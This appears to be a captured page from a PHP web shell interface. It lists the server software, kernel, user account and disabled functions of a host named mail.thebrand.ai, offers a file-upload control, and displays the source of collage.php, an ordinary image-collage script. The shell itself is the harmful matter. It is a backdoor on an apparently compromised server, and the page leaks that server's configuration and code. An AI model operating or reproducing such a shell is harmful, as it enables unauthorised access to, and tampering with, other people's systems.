( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/../collage.php
<?php include 'pages/collage.php';
 

$images=array("http://localhost/thebrand/taswira.php?cropratio=1:1&width=400&image=/v/uploads/raw/4c617237bf984c901de67ff00470ee2c.jpg",
"http://localhost/thebrand/taswira.php?cropratio=1:1&width=400&image=/v/uploads/raw/9f1e1267f80de8d57d0ea2339f25cb4f.jpg","http://localhost/thebrand/taswira.php?cropratio=1:1&width=400&image=/v/uploads/raw/e2da08ab246edf81ad283b79d8e5b3c4.jpg");

$time = time();
$type = 'jpg';
$imageObj = new Collage($images, 900, 900);
$imageObj->execute();
$imageObj->saveFile("images/{$time}.jpg", $type);
echo "<img src=\"images/{$time}.{$type}\" />";?>